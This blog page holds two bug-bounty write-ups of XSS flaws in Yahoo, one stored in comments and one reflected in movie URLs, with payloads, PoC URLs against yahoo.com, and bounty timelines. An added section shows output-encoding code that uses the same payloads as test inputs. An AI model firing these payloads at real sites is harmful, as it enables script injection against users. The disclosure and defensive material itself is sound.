Showing posts with label XSS In Yahoo. Show all posts

Stored XSS in Yahoo!


Sharing is Caring :)
When we share, we open doors to a new beginning.....
Well, now I am going to share how I found Stored Cross-Site Scripting (XSS) in Yahoo.

Steps to Reproduce:
Post this payload as a comment:
"><img src=x onerror=confirm(1);&gt



Now what? Voila! We get the famous confirm(1) popup! :D

I tried another payload so that I could write something in the popup box, and found this payload:
<img src=x onerror=prompt(1337)>

At that moment I felt like a boss! :P




Here is the video PoC:


Timeline:

31/03/2018 — Initial Report.
01/04/2018 — HackerOne staff asked for more info (Needs more info).
01/04/2018 — More Info Submitted.
04/04/2018 — Triaged and a $300 initial bounty rewarded.
06/04/2018 — Bug Resolved.
11/04/2018 — Another $1700 bounty rewarded. (Total $2000)

Reflected XSS in yahoo.com

Hello guys, this is Shahzada Al Shahriar Khan.
I am from Bangladesh, and I am a newbie in bug bounty. :P
Well, now I will share how I found Reflected Cross-Site Scripting (XSS) in the main domain and a subdomain of Yahoo.

Vulnerable URLs:
https://www.yahoo.com/movies/film/[*]
https://ca.yahoo.com/movies/film/[*]

Payload:
"><%2fscript><script>alert(document.domain)<%2fscript>

PoC URL:
https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>

PoC Screenshot:

Yahoo Canada Subdomain

Video PoC:



Timeline:
Aug 12th - I submitted the report.
Aug 15th - Report triaged and a $300 initial bounty rewarded.
Aug 16th - Bug resolved.
Aug 24th - Another $400 bounty rewarded. (Total $700)
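
As a defensive counterpart to the payloads in both posts, here is an added example (not part of the original posts and not Yahoo's code) of context-aware output encoding for the stored comment and for the reflected path segment. The templates, the function names, and the assumption that the path segment is echoed into an attribute and an inline script are hypothetical.

```javascript
// Added example; templates and function names are hypothetical, not Yahoo's code.

// Payloads exactly as quoted in the two posts above.
const COMMENT_PAYLOADS = [
  '"><img src=x onerror=confirm(1);&gt',
  '<img src=x onerror=prompt(1337)>',
];
const PATH_SEGMENT = '"><%2fscript><script>alert(document.domain)<%2fscript>';

// Encode for HTML text nodes and quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encode as a JavaScript string literal that is safe inside an inline <script>:
// JSON.stringify handles quotes and backslashes, and the \u escapes keep
// "</script>" away from the HTML parser.
function escapeForInlineScript(value) {
  return JSON.stringify(String(value))
    .replace(/[<>&\u2028\u2029]/g,
      (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Stored case: a comment rendered into the page body.
function renderComment(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// Reflected case (assumed sinks): path segment echoed into an attribute and a script.
function renderFilmPage(rawSegment) {
  const title = decodeURIComponent(rawSegment); // %2f becomes "/"
  return `<meta property="og:title" content="${escapeHtml(title)}">` +
         `<script>var film = ${escapeForInlineScript(title)};</script>`;
}

// True when the output contains only the tags the template itself emits.
function onlyTemplateTags(html, expected) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.length === expected;
}

for (const p of COMMENT_PAYLOADS) {
  console.log(onlyTemplateTags(renderComment(p), 2), renderComment(p));
}
console.log(onlyTemplateTags(renderFilmPage(PATH_SEGMENT), 3), renderFilmPage(PATH_SEGMENT));
```

The script-context encoder keeps the value as data: parsing the emitted literal returns the original string, so the film title still displays correctly while `</script>` never reaches the HTML parser.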